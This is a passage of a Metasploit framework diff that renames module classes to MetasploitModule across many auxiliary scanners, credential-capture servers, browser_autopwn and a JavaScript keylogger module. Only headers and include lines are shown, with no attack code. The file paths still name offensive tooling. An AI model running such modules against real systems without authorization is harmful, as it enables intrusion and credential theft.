a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -11,7 +11,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/steam/server_info.rb b/modules/auxiliary/scanner/steam/server_info.rb index 398e0fb038..e82b1bc79f 100644 --- a/modules/auxiliary/scanner/steam/server_info.rb +++ b/modules/auxiliary/scanner/steam/server_info.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/steam' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Rex::Proto::Steam diff --git a/modules/auxiliary/scanner/telephony/wardial.rb b/modules/auxiliary/scanner/telephony/wardial.rb index 18cd6912cc..8b07f815ee 100644 --- a/modules/auxiliary/scanner/telephony/wardial.rb +++ b/modules/auxiliary/scanner/telephony/wardial.rb @@ -34,7 +34,7 @@ class Object end end -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/brocade_enable_login.rb b/modules/auxiliary/scanner/telnet/brocade_enable_login.rb index c5beadbe05..117ab45ab4 100644 --- a/modules/auxiliary/scanner/telnet/brocade_enable_login.rb +++ b/modules/auxiliary/scanner/telnet/brocade_enable_login.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/telnet' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb b/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb index 061b3b1c10..86c676b14e 100644 --- a/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb +++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb index b6af840661..116f8f6752 100644 --- a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb index 2facedd4f1..b7d336428a 100644 --- a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb +++ b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb index 63dda3f8ab..3365467533 100644 --- a/modules/auxiliary/scanner/telnet/telnet_login.rb +++ b/modules/auxiliary/scanner/telnet/telnet_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/telnet' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb index a23e6058ef..de3d1de097 100644 --- a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb +++ b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/telnet/telnet_version.rb b/modules/auxiliary/scanner/telnet/telnet_version.rb index 644a178b89..3ec68ab891 100644 --- a/modules/auxiliary/scanner/telnet/telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/telnet_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb index dc1e190457..af26c5f107 100644 --- a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb +++ b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/tftp/netdecision_tftp.rb b/modules/auxiliary/scanner/tftp/netdecision_tftp.rb index fd8c131316..eaef1b8f21 100644 --- a/modules/auxiliary/scanner/tftp/netdecision_tftp.rb +++ b/modules/auxiliary/scanner/tftp/netdecision_tftp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/tftp/tftpbrute.rb b/modules/auxiliary/scanner/tftp/tftpbrute.rb index 29935dc352..3012f9401c 100644 --- a/modules/auxiliary/scanner/tftp/tftpbrute.rb +++ b/modules/auxiliary/scanner/tftp/tftpbrute.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/udp_scanner_template.rb b/modules/auxiliary/scanner/udp_scanner_template.rb index 07ec5c659d..8253611195 100644 --- a/modules/auxiliary/scanner/udp_scanner_template.rb +++ b/modules/auxiliary/scanner/udp_scanner_template.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/upnp/ssdp_amp.rb b/modules/auxiliary/scanner/upnp/ssdp_amp.rb index 5d2217308d..b5854af7e8 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_amp.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_amp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index 0f7496a036..99777f99e4 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb index 0cc62c9a60..753d309f50 100644 --- a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb +++ b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmauthd_login.rb b/modules/auxiliary/scanner/vmware/vmauthd_login.rb index 5844222e6c..abcdea7cb2 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_login.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_login.rb @@ -7,7 +7,7 @@ require 'msf/core/exploit/tcp' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/vmauthd' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/vmware/vmauthd_version.rb b/modules/auxiliary/scanner/vmware/vmauthd_version.rb index 28b6355385..abf0cd7665 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_version.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_version.rb @@ -5,7 +5,7 @@ require 'msf/core/exploit/tcp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb index d8bb09b6c5..39061893e6 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb index 3cd4b3563a..262d2304ee 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb index 8189a9b495..bc937bd926 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb index 45081e5019..0692fdb880 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_host_details.rb b/modules/auxiliary/scanner/vmware/vmware_host_details.rb index cd4cfb164c..e7929fed49 100644 --- a/modules/auxiliary/scanner/vmware/vmware_host_details.rb +++ b/modules/auxiliary/scanner/vmware/vmware_host_details.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_http_login.rb b/modules/auxiliary/scanner/vmware/vmware_http_login.rb index 0225eddd6e..36fc06096a 100644 --- a/modules/auxiliary/scanner/vmware/vmware_http_login.rb +++ b/modules/auxiliary/scanner/vmware/vmware_http_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb index de4f89435f..72caad0ee1 100644 --- a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb +++ b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb b/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb index 68e1922d5e..52f6bd5fd2 100644 --- a/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb +++ b/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb b/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb index 600db46d77..3e9cc9e5fd 100644 --- a/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb +++ b/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb index 91ec122893..22f1f22341 100644 --- a/modules/auxiliary/scanner/vnc/vnc_login.rb +++ b/modules/auxiliary/scanner/vnc/vnc_login.rb @@ -8,7 +8,7 @@ require 'rex/proto/rfb' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/vnc' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb index e16a345997..a787e463f7 100644 --- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb +++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/rfb' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/voice/recorder.rb b/modules/auxiliary/scanner/voice/recorder.rb index 0f4fe85d52..726c055267 100644 --- a/modules/auxiliary/scanner/voice/recorder.rb +++ b/modules/auxiliary/scanner/voice/recorder.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'fileutils' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::IAX2 diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb index 88914a5525..8a9f4a5c1f 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb index 655bfbf00b..b2e2a25df1 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb index 05b76dd142..5a946de15a 100644 --- a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb +++ b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index a4ce2652f7..73639a55bb 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -9,7 +9,7 @@ require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 1871aa59d1..8b651e1935 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -10,7 +10,7 @@ require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner' require 'metasploit/framework/login_scanner/winrm' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 7beaf89022..2705a1ce24 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/x11/open_x11.rb b/modules/auxiliary/scanner/x11/open_x11.rb index 32912c464f..1ca3590286 100644 --- a/modules/auxiliary/scanner/x11/open_x11.rb +++ b/modules/auxiliary/scanner/x11/open_x11.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/server/android_browsable_msf_launch.rb b/modules/auxiliary/server/android_browsable_msf_launch.rb index 7d603eb953..6763597f09 100644 --- a/modules/auxiliary/server/android_browsable_msf_launch.rb +++ b/modules/auxiliary/server/android_browsable_msf_launch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer diff --git a/modules/auxiliary/server/android_mercury_parseuri.rb b/modules/auxiliary/server/android_mercury_parseuri.rb index d152584e06..cbce29df4f 100644 --- a/modules/auxiliary/server/android_mercury_parseuri.rb +++ b/modules/auxiliary/server/android_mercury_parseuri.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index 35a4fcc4cc..0ff0e253b8 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -12,7 +12,7 @@ require 'msf/core' require 'rex/exploitation/js/detect' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb index 1c28beee94..a43d870673 100644 --- a/modules/auxiliary/server/browser_autopwn2.rb +++ b/modules/auxiliary/server/browser_autopwn2.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::BrowserAutopwn2 diff --git a/modules/auxiliary/server/capture/drda.rb b/modules/auxiliary/server/capture/drda.rb index 970b8cda7f..004bf01aa2 100644 --- a/modules/auxiliary/server/capture/drda.rb +++ b/modules/auxiliary/server/capture/drda.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb index 667eca6a4a..8d01ea4a46 100644 --- a/modules/auxiliary/server/capture/ftp.rb +++ b/modules/auxiliary/server/capture/ftp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index 721835e278..82118512d3 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/http_basic.rb b/modules/auxiliary/server/capture/http_basic.rb index 8e8db5c2ab..5b68785373 100644 --- a/modules/auxiliary/server/capture/http_basic.rb +++ b/modules/auxiliary/server/capture/http_basic.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/http_javascript_keylogger.rb b/modules/auxiliary/server/capture/http_javascript_keylogger.rb index aefe8fce9c..e6cf859bb2 100644 --- a/modules/auxiliary/server/capture/http_javascript_keylogger.rb +++ b/modules/auxiliary/server/capture/http_javascript_keylogger.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb index 9d775d940d..04d052845c 100644 --- a/modules/auxiliary/server/capture/http_ntlm.rb +++ b/modules/auxiliary/server/capture/http_ntlm.rb @@ -13,7 +13,7 @@ NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/imap.rb b/modules/auxiliary/server/capture/imap.rb index 843ef0580b..979f44a84a 100644 --- a/modules/auxiliary/server/capture/imap.rb +++ b/modules/auxiliary/server/capture/imap.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/mssql.rb b/modules/auxiliary/server/capture/mssql.rb index 99885df4af..4f660f1d78 100644 --- a/modules/auxiliary/server/capture/mssql.rb +++ b/modules/auxiliary/server/capture/mssql.rb @@ -12,7 +12,7 @@ NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Exploit::Remote::SMB::Server diff --git a/modules/auxiliary/server/capture/mysql.rb b/modules/auxiliary/server/capture/mysql.rb index a11ff87366..aba21c66df 100644 --- a/modules/auxiliary/server/capture/mysql.rb +++ b/modules/auxiliary/server/capture/mysql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/pop3.rb b/modules/auxiliary/server/capture/pop3.rb index f22877434f..92cd3a383e 100644 --- a/modules/auxiliary/server/capture/pop3.rb +++ b/modules/auxiliary/server/capture/pop3.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/postgresql.rb b/modules/auxiliary/server/capture/postgresql.rb index d9f11042d1..bafb8f0366 100644 --- a/modules/auxiliary/server/capture/postgresql.rb +++ b/modules/auxiliary/server/capture/postgresql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/printjob_capture.rb b/modules/auxiliary/server/capture/printjob_capture.rb index 8c08bf33d4..5c6954fe81 100644 --- a/modules/auxiliary/server/capture/printjob_capture.rb +++ b/modules/auxiliary/server/capture/printjob_capture.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/server/capture/sip.rb b/modules/auxiliary/server/capture/sip.rb index 03dd3e2113..debf7c8653 100644 --- a/modules/auxiliary/server/capture/sip.rb +++ b/modules/auxiliary/server/capture/sip.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/socket' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index 1f3e23306a..100f800596 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::SMB::Server diff --git a/modules/auxiliary/server/capture/smtp.rb b/modules/auxiliary/server/capture/smtp.rb index 12769c29cb..f44de779d7 100644 --- a/modules/auxiliary/server/capture/smtp.rb +++ b/modules/auxiliary/server/capture/smtp.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/telnet.rb b/modules/auxiliary/server/capture/telnet.rb index d1cabac7e4..73b966de96 100644 --- a/modules/auxiliary/server/capture/telnet.rb +++ b/modules/auxiliary/server/capture/telnet.rb @@ -6,7 +6,7 @@ require 'msf/core' # Fake Telnet Service - Kris Katterjohn 09/28/2008 -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/vnc.rb b/modules/auxiliary/server/capture/vnc.rb index adf634969d..b6e6cb0121 100644 --- a/modules/auxiliary/server/capture/vnc.rb +++ b/modules/auxiliary/server/capture/vnc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/dhclient_bash_env.rb b/modules/auxiliary/server/dhclient_bash_env.rb index 1441bd48c9..edb64ec9e4 100644 --- a/modules/auxiliary/server/dhclient_bash_env.rb +++ b/modules/auxiliary/server/dhclient_bash_env.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DHCPServer diff --git a/modules/auxiliary/server/dhcp.rb b/modules/auxiliary/server/dhcp.rb index 65aad4275c..d25ee16e46 100644 --- a/modules/auxiliary/server/dhcp.rb +++ b/modules/auxiliary/server/dhcp.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DHCPServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/dns/spoofhelper.rb b/modules/auxiliary/server/dns/spoofhelper.rb index 1fda7a81a6..f4f2f3ca8f 100644 --- a/modules/auxiliary/server/dns/spoofhelper.rb +++ b/modules/auxiliary/server/dns/spoofhelper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'resolv' 